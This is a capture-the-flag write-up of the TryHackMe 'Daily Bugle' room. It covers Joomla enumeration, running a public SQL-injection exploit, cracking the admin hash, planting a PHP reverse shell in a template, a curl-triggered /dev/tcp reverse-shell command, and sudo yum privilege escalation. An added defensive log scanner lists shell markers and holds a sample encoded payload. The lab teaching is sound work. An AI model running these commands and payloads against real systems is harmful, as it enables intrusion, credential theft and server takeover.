
Daily Bugle — TryHackMe

Tags: Web, Enumeration, Privilege Escalation, Linux

Access the target server

Daily Bugle webpage loaded in browser

Scanning Target

sudo nmap -p- -sS -sV -sC -T4 <TARGET_IP>
Nmap scan results

Enumerating Endpoints

feroxbuster -u http://<TARGET_IP>/
Feroxbuster results showing administrator endpoint

Interesting discovery: /administrator

Joomla Version Discovery

curl -s http://<TARGET_IP>/administrator/manifests/files/joomla.xml
Joomla version XML output

Admin Page

Joomla admin login page

Searching Exploit

Found a Joomla 3.7 exploit and downloaded it:

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
python3 joomblah.py http://<TARGET_IP>/
Exploit repository
Exploit leaking credentials

Cracking Credentials

Extracted hash → cracked with John:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
John cracked password

Login success:

Joomla admin dashboard

Template Editing to Achieve RCE

Available templates:

Joomla template list

Injected PHP reverse shell in templates/protostar/error.php

Injected PHP code

Triggering Payload

Access a non-existent page to trigger the error page:

Triggering error page

Reverse Shell

nc -lvnp 4444
curl "http://<TARGET_IP>/index.php/qqq?cmd=bash -c 'bash -i >& /dev/tcp/<MY_IP>/4444 0>&1'"
Reverse shell connected
Navigating shell session
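
The same request as seen from the defender's side, as an added example that is not part of the original writeup: a small scanner that flags web access log entries carrying a command-style parameter or shell markers in the query string. It assumes the Apache/Nginx "combined" log format; the indicator lists and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache/Nginx "combined" format: ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Assumed indicator lists; tune them to your own applications.
SUSPECT_PARAMS = {"cmd", "exec", "command"}
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "bash -c", "/bin/sh", "0>&1")

# Constructed sample log lines (documentation IP ranges), not from a real host.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jan/2024:10:01:30 +0000] "GET /index.php?option=com_search&searchword=bash+tutorial HTTP/1.1" 200 4200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /index.php/qqq?cmd=bash+-i+%3E%26+%2Fdev%2Ftcp%2F203.0.113.5%2F4444+0%3E%261 HTTP/1.1" 404 3100 "-" "curl/8.0"',
]


def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a request line in the expected format
    parts = urlsplit(m["target"])
    # Flag parameter names typical of one-line command runners.
    reasons = {f"param:{name}" for name, _ in
               parse_qsl(parts.query, keep_blank_values=True)
               if name.lower() in SUSPECT_PARAMS}
    # Match markers on the whole decoded query so a raw '&' inside a
    # payload (which splits parameters) cannot hide them.
    decoded = unquote_plus(parts.query)
    reasons |= {f"marker:{s}" for s in SHELL_MARKERS if s in decoded}
    if not reasons:
        return None
    return {"ip": m["ip"], "path": parts.path,
            "status": int(m["status"]), "reasons": sorted(reasons)}


def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on a path that returns 404, as in the third sample line, is worth correlating with recent changes to the site's template files.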

Credential Discovery

Found DB credentials in the Joomla config inside /var/www/html.

Database credentials found in config

SSH Access

ssh jjameson@<TARGET_IP>
SSH session success
User Flag Obtained
User flag

Privilege Escalation

Check sudo privileges:

sudo -l
sudo -l output

User can run yum as root → GTFOBins:

https://gtfobins.github.io/gtfobins/yum/#sudo
GTFOBins page

Execute exploit → root.

Root Flag Obtained
Root flag

Final Notes

  • CMS exploitation is extremely realistic in real-world engagements.
  • Template editors are powerful RCE entry points.
  • Credential reuse continues to be a serious risk.
  • Sudo misconfigurations remain deadly.